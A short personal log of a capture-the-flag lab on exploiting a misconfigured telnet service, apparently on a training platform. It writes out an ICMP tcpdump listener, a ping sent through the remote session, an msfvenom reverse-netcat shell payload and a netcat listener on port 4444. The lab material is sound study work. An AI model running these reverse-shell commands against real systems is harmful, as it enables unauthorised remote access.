31 Dec 2022
Same process as with SMB, start with a port scan.
Answered the questions
Since I always forget,
CVE - Common Vulnerabilities and Exposures
Even though CVEs exist for telnet, still far more likely to find a misconfiguration to exploit.
Try connecting to system scanned in previous task.
Need to use a listener; can use tcpdump with sudo tcpdump ip proto \\icmp -i eth0 to start a tcpdump listener listening for ICMP traffic. Only use eth0 for the AttackBox; use tun0 for a VPN connection. Initiate a ping on the remote session using .RUN ping [ip address] -c 1, where ip address is the local machine, to see if commands can be sent to the remote session and whether it can connect all the way back.
Create a reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R where:
Start netcat listener with nc -lvp 4444. Once connected, can run commands through listener.
Answered all questions and got the flag.